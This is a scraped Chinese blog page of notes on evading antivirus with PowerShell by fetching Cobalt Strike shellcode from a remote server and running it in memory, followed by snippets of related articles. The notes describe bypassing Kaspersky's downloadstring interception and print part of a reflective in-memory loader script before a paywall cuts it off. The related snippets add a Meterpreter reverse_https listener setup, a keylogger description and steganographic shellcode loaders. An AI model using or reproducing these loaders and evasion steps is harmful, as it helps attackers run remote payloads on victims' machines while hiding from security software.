Powershell免杀(远程加载shellcode)笔记

最新推荐文章于 2025-10-13 11:18:52 发布
原创 最新推荐文章于 2025-10-13 11:18:52 发布 · 2.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何使用PowerShell进行免杀的远程加载shellcode操作。通过将恶意代码存放在远程服务器,然后利用PowerShell从URI读取字节数组并在内存中执行,以此避开安全软件的检测。同时,文中提到了如何在出网限制下,通过特定方法绕过卡巴斯基对`downloadstring`的拦截,以及如何在不出网的情况下,从本地bin文件中读取字节数组来实现相同目的。

原文链接

远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。

下面代码直接从uri读取字节数组(对的,没仔细看)

# remoteshell.ps1

Set-StrictMode -Version 2

function get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}


function get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($va
最低0.47元/天 解锁文章
jackslowf
关注
Ladon for PowerShell远程加载教程
K8哥哥
08-08 813
前言 本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档 脚本可直接远程内存加载使用无须,或者有些人比较喜欢的所谓无文件渗透 完整文档:http://k8gege.org/Ladon 架设WEB服务器 使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本 实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网) 将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB 远程加载MS17010漏洞扫描 powershell
网络安全-powershell:powersploit Invoke-shellcode
u013930899的博客
05-06 2238
一、直接执行ShellCode反弹Meterpreter Shell 1. 设置msf Msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https (一定要选择对应的位数,x64) set LHOST 192.168.101.46 set LPORT 4444 Run 2. 生成powershell脚本木马 msfvenom -p windows/x6.
Win32下ShellCode远程加载
优快云
05-28 5939
如下Python代码是一个基本的键盘记录器,它使用了一些Windows API函数和第三方库来监视键盘活动,并记录按键、窗口切换和剪贴板操作。然后,它检测按键是否为常规按键,如果是,则输出按键字符。如果按下的是Ctrl+V,它会尝试获取剪贴板的内容并输出。函数是一个回调函数,用于处理键盘事件。它首先检测是否切换了窗口,如果切换了窗口,就调用。最后,它输出进程相关的信息。接下来,代码定义了一些全局变量和函数,包括。函数用于获取当前前台窗口的进程信息,以及。首先,代码导入了一些必要的库,包括。
小熊远控V5.8远程控制技术解析与安全风险分析
最新发布
weixin_35751412的博客
10-13 1062
字段名长度(字节)类型描述2uint16标识协议头开始,固定值0x5A5A1uint8指令类型:1=鼠标,2=键盘,3=屏幕请求等4uint32包序号,用于重排序与丢包检测Timestamp8uint64发送时间戳(纳秒级),用于延迟测量2uint16负载长度Payload变长byte[]实际数据内容CRC324uint32。
PowerSploit 之 Invoke-ShellCode
weixin_46104215的博客
11-08 1833
Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码) 反向连接的shellcode: 当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接.
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了性和隐匿性。 0x02 参考链接
内网安全攻防读书笔记(2)——powershell基础
qq_40909772的博客
11-26 3996
文章目录1.基本概念1.1 .ps1文件1.2 执行策略1.3 管道2.常用命令2.1 文件操作命令2.2 绕过本地权限并执行2.3 使用base64对PowerShell命令进行编码2.3 运行32位和64位powershell   powershell是windows的一种命令行外壳程序。只要一台计算机上可以运行代码,就可以将powershell脚本文件执行,甚至无需写入到磁盘中。powershell拥有以下几个重要的特点: 脚本可以在内存中运行,不需要写入到磁盘中。 可以远程执行。 可用于管理活动目
实训周笔记
m0_67370064的博客
04-07 364
PowerShell简介 常用的PowerShell攻击工具: PowerSploit Nishang PowerCat PowerShell是一种基于任务的命令行解释器和脚本环境,可以说是一种强大的shell,如同linux的bash,专为系统管理员而设计,以.NET框架为平台,Windows PowerShell帮助IT专业人员和超级用户控制和自动化管理Windows操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避Anti-Viru..
实训笔记2.0
qq_65745696的博客
03-24 1012
CSRF漏洞介绍 CSRF (Cross--site request forgery,跨站请求伪造))也被称为 One Click Attack 或者 Session Riding,通常缩写为 CSRF 或者 XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF 则通过伪装成受信任用户请求受信任的网站。与 XSS 攻击相比,CSRF 攻击往往不大流行(因此对其进行防范的资源也相当稀少)也难以防范,所以被认为比 XSS 更具危
渗透测试学习笔记(metasploit)
hklearner的博客
02-21 3566
METASPLOIT exploit-db.com •Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 渗透攻击(exploit) 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。 攻击载荷(payload) 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的
探秘安全领域:图片隐写式远程Shellcode加载
gitblog_00043的博客
06-03 445
探秘安全领域:图片隐写式远程Shellcode加载器 去发现同类优质开源项目:https://gitcode.com/ 在这个数字化的时代,网络安全的重要性不言而喻。今天,我们要向您推荐一款独特的开源工具——一个基于图片隐写的远程Shellcode加载器,无需文件落地,确保隐蔽性的同时,提供了一种新的攻击防御挑战。 项目介绍 该项目是一个创新的安全研究实践,它利用图片隐藏数据的能力,将加密后的Sh...
juiced:生成通过PowerShell.NET在内存中执行shellcode的自定义有效负载
04-28
榨汁-最新版本为v1.8 Ruby脚本可将基于Matthew Graebers PowerShell Attacks(史诗般的帖子)和TrustedSec的修改结果输出到各种有效载荷格式中。 工具功能:该脚本将在Msfvenom格式化相应的选项,它发出的有效载荷(ie.windows/meterpreter/reverse_https)到msfvenom,修改接收到的shellcode,并且指定的负载类型中嵌入它。 当前的有效载荷格式:宏=散出功能齐全的复制/粘贴单词宏jar =将发布powershell语法的可执行jar文件* vbs =将发布powershell语法的可执行vbs文件* js =将执行powershell语法的可执行js文件发出powershell语法* ps =可以粘贴到命令提示符中的实际复制/可粘贴命令war =发出powershell语法的war文件* as
加载shellcode到32位Windows程序远程进程中
微码信息
11-16 325
BOOL WINAPI LoadDll(HANDLE hProcess,LPVOID lpBuf,int cbBuf) { BOOL br = FALSE; LPVOID m_lpData = VirtualAllocEx(hProcess, NULL,cbBuf,MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (m_lpData==NULL) { goto cleanup0; } if(!WriteProcessMemory(hProcess,
对抗】远程加载AES+XOR异或加密的ShellCode加载器 过国内
qq_35942869的博客
03-28 2545
纯萌新,尝试一下,最近也是查了很多资料,面向Github编程借鉴了很多大佬的代码。通过XOR异或加密后再进行AES加密,然后通过修改shellcode加载方式进行简单的
笔记ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 835
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
c++调用powershell_从ShellCode启动PowerShell后门
weixin_39592137的博客
10-21 794
当您需要在受害者的计算机上执行恶意操作时,Internet上充满了可以重复使用,分叉或稍作更改以满足您要求的资源。毕竟,如果一些代码可以在GitHub上费获得,为什么还要重新发明轮子呢?如果您有充分的理由开发了一些攻击性工具(因为您是一个彭特,是一个只从事研究工作的红色团队),那么很可能会重用您的代码。这是一个在野外发现的实际例子。初始PowerShell脚本的VT分数为8/59(SH...
简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
使用Powershell 远程执行
布谷鸟
03-03 4651
使用Powershell 远程执行
C/C++ 远程ShellCode执行工具
优快云
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值